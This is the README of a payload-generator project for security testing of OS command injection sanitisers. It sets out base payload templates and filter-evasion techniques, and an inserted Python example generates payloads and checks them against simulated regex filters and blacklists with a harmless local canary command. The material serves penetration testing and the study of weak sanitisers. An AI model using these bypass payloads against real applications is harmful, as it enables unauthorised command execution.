SHELLING - an offensive approach to the anatomy of improperly written OS command injection sanitisers
Latest commit 825155f Jul 26, 2016 @ewilded committed on GitHub Add files via upload
Updated sample payload sets (after adding the vertical tab for win).
REPOSITORY CONTENTS

  • shelling.pl (the payload generator; last updated Jul 26, 2016)
  • nix.txt, win.txt, nix_win_universal.txt (platform-specific sample payload sets; added Jul 26, 2016)
  • test_cases (sample sanitisers to test against, e.g. escape_shell_cmd.php; Jul 23, 2016)
  • README.md (this file; updated Jul 16, 2016)


To improve the accuracy of blind OS command injection testing we need a comprehensive, analytic approach. In general, an injection payload can fail because of:

  • the actual syntax of the expression we end up injecting into (solution: base payload variants)
  • input sanitising mechanisms that reject forbidden characters (solution: evasive techniques)
  • platform-specific conditions, e.g. using a Windows command on a *nix host (solution: platform-specific payload sets, nix.txt / win.txt / nix_win_universal.txt)
  • a bad callback method, e.g. the command is executed asynchronously, or the host allows no outbound traffic (solution: base payload variants carrying different callbacks, such as a time delay where a network callback cannot get out)

BASE PAYLOAD VARIANTS (BASIC CASES)

  • MALICIOUS_COMMAND (will this ever happen? Yes: in argument injections where the input already lands in command position, e.g. `$USER_SUPPLIED` used as the command itself or expanded inside `$(USER_SUPPLIED)`)
  • MALICIOUS_COMMAND+COMMAND_TERMINATOR (the same situation, but with fixed text appended after the injection point that has to be cut off, while command separators are not allowed)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND (simple injections with no filtering, like `cat $USER_SUPPLIED`)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (simple injections with no filtering and appended fixed text, like `cat $USER_SUPPLIED something`)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (simple injections like `cat $USER_SUPPLIED something`, behind a lax filter such as `\w+$` that only checks how the input ends)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (injections behind a lax filter such as `^\w+` that only checks how the input starts, with appended fixed text, like `cat $USER_SUPPLIED something`)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (injections with appended fixed text, like `cat $USER_SUPPLIED something`, behind a lax filter that checks both ends but nothing in between, such as `^\w+\s+.*\w+$`)
  • PREFIX+MALICIOUS_COMMAND+SUFFIX (the backtick and `$()` command substitution notations, for input that lands inside a string the shell still expands, e.g. `cat "$USER_SUPPLIED"`)

EVASIVE TECHNIQUES USED

  • alternative COMMAND_SEPARATORS
  • alternative ARGUMENT_SEPARATORS
  • alternative COMMAND_TERMINATORS
  • additional prefixes and suffixes to get around lax filters
  • additional prefixes and suffixes to fit into quoted expressions
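The base payload variants and the evasive dimensions above, combined into a small generator, as an added example that is neither shelling.pl nor its payload files. It builds payloads from assumed separator, terminator, prefix and suffix sets, pushes each one through a simulated sanitiser (the regex filters named in the variant list, plus two character blacklists) and a sink context from the list above, runs the assembled command line under a real POSIX sh, and reports the first variant that both passes the filter and gets our command (`touch <canary file>`) executed. The sets, the filters, the contexts and the function names (`generate`, `first_working`, `probe`) are all this example's own assumptions.

```python
"""Added example, not shelling.pl and not the project's payload files: a small
generator for the README's BASE PAYLOAD VARIANTS and EVASIVE TECHNIQUES, run
against simulated sanitisers and sink contexts under a real POSIX sh.
The separator/prefix/suffix sets, the filters, the contexts and every function
name here are this example's own assumptions."""
import itertools
import os
import re
import subprocess
import tempfile

MARK = "INPUT"  # stands for the user-supplied value in each sink context

# Evasive dimensions (assumed, deliberately small sets).
ARGUMENT_SEPARATORS = [" ", "${IFS}"]        # ${IFS} replaces forbidden whitespace
COMMAND_SEPARATORS = [";", "|", "&&", "\n"]   # a newline survives [;|&] blacklists
COMMAND_TERMINATORS = [" #"]                  # '#' only starts a comment at a word start
PREFIXES = ["", "a ", '"']                    # satisfy ^\w+ style filters, or close a quote
SUFFIXES = ["", " a", '"']                    # satisfy \w+$ style filters, or reopen a quote

# Sink contexts (what the application wraps around the input), as in the README.
CONTEXTS = ["cat INPUT", "cat INPUT something", 'cat "INPUT"', "echo $(INPUT)",
            "INPUT -la"]                      # last one: input already in command position

# Simulated sanitisers: each returns True when the input is accepted.
# Note that Python's '$' (like PCRE's without the D modifier) also matches just
# before a trailing newline, which the newline separator quietly exploits.
FILTERS = {
    "none": lambda s: True,
    r"^\w+": lambda s: re.match(r"^\w+", s) is not None,
    r"\w+$": lambda s: re.search(r"\w+$", s) is not None,
    r"^\w+\s+.*\w+$": lambda s: re.match(r"^\w+\s+.*\w+$", s) is not None,
    "no whitespace": lambda s: re.search(r"\s", s) is None,
    "no $ ` ; | &": lambda s: re.search(r"[$`;|&]", s) is None,
}


def base_variants(cmd, sep, term, pre, suf):
    """The README's eight base payload variants, keyed by their template."""
    return {
        "CMD": cmd,
        "CMD+TERM": cmd + term,
        "SEP+CMD": sep + cmd,
        "SEP+CMD+SEP": sep + cmd + sep,
        "SEP+CMD+SEP+SUF": sep + cmd + sep + suf,
        "PRE+SEP+CMD+SEP": pre + sep + cmd + sep,
        "PRE+SEP+CMD+SEP+SUF": pre + sep + cmd + sep + suf,
        "PRE+CMD+SUF": "$(" + cmd + ")",      # backticks are the other substitution notation
    }


def generate(command, args):
    """Yield (variant, payload) for every combination of the evasive dimensions,
    skipping payload strings an earlier combination already produced."""
    seen = set()
    for asep, sep, term, pre, suf in itertools.product(
            ARGUMENT_SEPARATORS, COMMAND_SEPARATORS, COMMAND_TERMINATORS,
            PREFIXES, SUFFIXES):
        cmd = asep.join([command, *args])
        for variant, payload in base_variants(cmd, sep, term, pre, suf).items():
            if payload not in seen:
                seen.add(payload)
                yield variant, payload


def executes(cmdline, canary, workdir):
    """Run the assembled command line under sh; True if the canary file appeared.
    stdin is /dev/null so a bare 'cat' left over from the context cannot block."""
    if os.path.exists(canary):
        os.remove(canary)
    try:
        subprocess.run(["sh", "-c", cmdline], cwd=workdir, stdin=subprocess.DEVNULL,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10)
    except subprocess.TimeoutExpired:
        return False
    return os.path.exists(canary)


def first_working(context, accepts, workdir):
    """First (variant, payload) that the filter accepts AND that makes the sink run
    our command ('touch <canary>'), or None if this small set has no answer."""
    canary = os.path.join(workdir, "canary")
    for variant, payload in generate("touch", [canary]):
        if accepts(payload) and executes(context.replace(MARK, payload), canary, workdir):
            return variant, payload
    return None


def probe(context, filter_name):
    """Run first_working() for one context/filter pair in a fresh temp dir."""
    return first_working(context, FILTERS[filter_name], tempfile.mkdtemp())


if __name__ == "__main__":
    for context in CONTEXTS:
        for name in FILTERS:
            print(f"{context:22} {name:18} -> {probe(context, name)}")
```

Running it prints one line per context/filter pair, e.g. `cat INPUT something` behind `^\w+` is first hit by PRE+SEP+CMD+SEP (`a ;touch ...;`), the quoted `cat "INPUT"` context with no filter by PRE+CMD+SUF (`$(touch ...)`), and the whitespace blacklist by `${IFS}` as the argument separator. A `None` entry shows where this small set needs one more dimension: `cat "INPUT"` behind `^\w+` is only reachable with a prefix such as `a"` that satisfies the filter and closes the quote in one go, which is exactly the kind of combination the project's larger payload lists carry.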

Other evasive techniques considered:

  • alternative payloads to avoid particular bad characters
  • encoding-related variations, such as double URL encoding